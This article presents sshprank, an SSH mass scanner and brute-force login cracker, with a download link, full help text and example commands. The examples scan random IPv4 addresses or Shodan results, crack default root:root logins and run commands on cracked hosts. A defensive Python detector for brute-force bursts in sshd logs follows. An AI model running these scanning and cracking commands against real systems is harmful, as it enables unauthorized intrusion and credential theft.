sshprank: a high-speed SSH brute-force scanner
sshprank SSH scanner
A fast SSH mass scanner, login cracker and banner grabber that uses the python-masscan and shodan modules.
Download
```
git clone https://github.com/noptrix/sshprank.git
```
Usage
```
[ hacker@blackarch ~ ]$ sshprank -H
              __                           __
   __________/ /_  ____  _________ _____  / /__
  / ___/ ___/ __ \/ __ \/ ___/ __ `/ __ \/ //_/
 (__  |__  ) / / / /_/ / /  / /_/ / / / / ,<
/____/____/_/ /_/ .___/_/   \__,_/_/ /_/_/|_|
               /_/

      --== [ by nullsecurity.net ] ==--

usage

  sshprank <mode> [opts] | <misc>

modes

  -h <host:[ports]>     - single host to crack. multiple ports can be seperated
                          by comma, e.g.: 22,2022,22222 (default port: 22)

  -l <file>             - list of hosts to crack. format: <host>[:ports]. multiple
                          ports can be seperated by comma (default port: 22)

  -m <opts> [-r <num>]  - pass arbitrary masscan opts, portscan given hosts and
                          crack for logins. found sshd services will be saved to
                          'sshds.txt' in supported format for '-l' option and
                          even for '-b'. use '-r' for generating random ipv4
                          addresses rather than scanning given hosts. these
                          options are always on: '-sS -oX - --open'.
                          NOTE: if you intent to use the '--banner' option then
                          you need to specify '--source-ip <some_ipaddr>' which
                          is needed by masscan. better check masscan options!

  -s <str;page;lim>     - search ssh servers using shodan and crack logins.
                          see examples below. note: you need a better API key
                          than this one i offer in order to search more than 100
                          (= 1 page) ssh servers. so if you use this one use
                          '1' for 'page'. don't bother me with this, bitch

  -b <file>             - list of hosts to grab sshd banner from
                          format: <host>[:ports]. multiple ports can be
                          seperated by comma (default port: 22)

options

  -r <num>              - generate <num> random ipv4 addresses, check for open
                          sshd port and crack for login (only with -m option!)
  -c <cmd>              - execute this <cmd> on host if login was cracked
  -u <user>             - single username (default: root)
  -U <file>             - list of usernames
  -p                    - single password (default: root)
  -P <file>             - list of passwords
  -C <file>             - list of user:pass combination
  -x <num>              - num threads for parallel host crack (default: 20)
  -S <num>              - num threads for parallel service crack (default: 20)
  -X <num>              - num threads for parallel login crack (default: 20)
  -B <num>              - num threads for parallel banner grabbing (default: 70)
  -T <sec>              - num sec for connect timeout (default: 2s)
  -R <sec>              - num sec for (banner) read timeout (default: 2s)
  -o <file>             - write found logins to file. format:
                          <host>:<port>:<user>:<pass> (default: owned.txt)
  -e                    - exit after first login was found. continue with other
                          hosts instead (default: off)
  -v                    - verbose mode. show found logins, sshds, etc.
                          (default: off)

misc

  -H                    - print help
  -V                    - print version information

examples

  # crack targets from a given list with user admin, pw-list and 20 host-threads
  $ sshprank -l sshds.txt -u admin -P /tmp/passlist.txt -x 20

  # first scan then crack from founds ssh services
  $ sudo sshprank -m '-p22,2022 --rate 5000 --source-ip 192.168.13.37 \
    --range 192.168.13.1/24'

  # generate 1k random ipv4 addresses, then port-scan (tcp/22 here) with 1k p/s
  # and crack login 'root:root' on found sshds
  $ sudo sshprank -m '-p22 --rate=1000' -r 1000 -v

  # search 50 ssh servers via shodan and crack logins using 'root:root' against
  # found sshds
  $ sshprank -s 'SSH;1;50'

  # grab banners and output to file with format supported for '-l' option
  $ sshprank -b hosts.txt > sshds2.txt
```
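The tool ships with built-in user and password wordlists, which you can extend or customise; combined with a script that generates weak-password dictionaries from social-engineering information, it can sometimes produce unexpected results.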
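Seen from the defending side, the defaults in the help text above (user root, password root, 20 parallel login threads) show up in sshd logs as a tight burst of failed password logins from one source. The following detector is an added example, not code from the original post or from the sshprank project; the log lines are constructed, and the threshold, window and assumed year are illustrative values.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample in OpenSSH syslog format (documentation IP ranges, not real traffic).
SAMPLE_LOG = """\
Mar  3 10:00:01 web1 sshd[811]: Failed password for root from 203.0.113.7 port 40112 ssh2
Mar  3 10:00:01 web1 sshd[812]: Failed password for root from 203.0.113.7 port 40114 ssh2
Mar  3 10:00:02 web1 sshd[813]: Failed password for invalid user admin from 203.0.113.7 port 40116 ssh2
Mar  3 10:00:02 web1 sshd[814]: Failed password for root from 203.0.113.7 port 40118 ssh2
Mar  3 10:00:03 web1 sshd[815]: Failed password for root from 203.0.113.7 port 40120 ssh2
Mar  3 10:00:04 web1 sshd[816]: Accepted password for root from 203.0.113.7 port 40122 ssh2
Mar  3 10:05:00 web1 sshd[901]: Failed password for alice from 198.51.100.9 port 5222 ssh2
"""

EVENT = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+")

def parse_events(text, year=2024):
    """Yield (timestamp, ip, user, ok) per password-auth line; syslog omits the year, so one is assumed."""
    for line in text.splitlines():
        m = EVENT.match(line)
        if m:
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            yield ts, m["ip"], m["user"], m["result"] == "Accepted"

def detect_guessing(text, threshold=5, window=timedelta(seconds=10)):
    """Flag sources with >= threshold failures inside `window` and list logins that succeeded afterwards."""
    by_ip = defaultdict(list)
    for ts, ip, user, ok in parse_events(text):
        by_ip[ip].append((ts, user, ok))
    report = {}
    for ip, events in by_ip.items():
        events.sort()
        fails = [(ts, user) for ts, user, ok in events if not ok]
        start = 0
        for end in range(len(fails)):
            while fails[end][0] - fails[start][0] > window:
                start += 1  # slide the window forward
            if end - start + 1 >= threshold:
                burst_at = fails[end][0]
                report[ip] = {
                    "users": sorted({u for _, u in fails}),
                    "success_after": [u for ts, u, ok in events if ok and ts >= burst_at],
                }
                break
    return report
```

A non-empty `success_after` list is the case to escalate: a password login was accepted from a source that had just been guessing.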
All media may republish this content provided the attribution and the original link are retained; otherwise our content may not be used.